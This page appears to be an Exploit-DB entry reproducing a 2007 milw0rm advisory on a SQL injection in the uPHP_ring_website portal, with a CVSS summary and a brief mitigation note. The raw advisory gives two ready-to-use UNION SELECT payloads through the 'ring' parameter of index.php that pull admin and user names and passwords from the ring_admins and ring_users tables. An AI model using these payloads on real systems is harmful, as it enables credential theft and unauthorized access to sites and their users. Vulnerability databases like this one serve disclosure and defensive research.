header-logo
Suggest Exploit
vendor:
uPHP_ring_website
by:
Dj7xpl
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: uPHP_ring_website
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

uPHP_ring_website SQL Injection Attack

The uPHP_ring_website portal is vulnerable to SQL injection. An attacker can exploit the vulnerability by injecting malicious SQL queries through the 'ring' parameter in the index.php file. The attacker can retrieve sensitive information such as admin usernames and passwords or user details.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

                                                     Y! Underground Group
						        http://2600.ir

								
								
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......:   uPHP_ring_website
Download.....:   http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........:   Sql Injection Attack
Author.......:   Dj7xpl / dj7xpl@2600.ir
HomePage.....:   http://Dj7xpl.2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

index.php?ring=Sql.Inject

index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]